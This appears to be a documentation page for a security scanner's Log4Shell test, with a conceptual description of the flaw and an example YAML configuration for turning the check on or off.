Injection: Log4Shell¶

Identifier: log4shell

Scanner(s) Support¶

Description¶

Log4Shell is a serious flaw in a logging tool where an attacker can send specially crafted input that tricks the system into fetching and executing malicious code from a remote source. This happens because the logging library processes dynamic data without proper safeguards, allowing untrusted information to trigger actions like loading rogue code. That means if a developer unknowingly logs user input directly, it might become a backdoor for hackers, exposing systems to full compromise. The danger lies in the ease of execution and the potential for widespread impact if left unpatched, especially in systems that use logs as diagnostic data without filtering.

References:

• https://cwe.mitre.org/data/definitions/829.html
• https://logging.apache.org/log4j/2.x/security.html

Configuration¶

Example¶

Example configuration:

---
security_tests:
  log4shell:
    assets_allowed:
    - REST
    - GRAPHQL
    - WEBAPP
    skip: false

Reference¶

assets_allowed¶

Type : List[AssetType]*

List of assets that this check will cover.

skip¶

Type : boolean

Skip the test if true.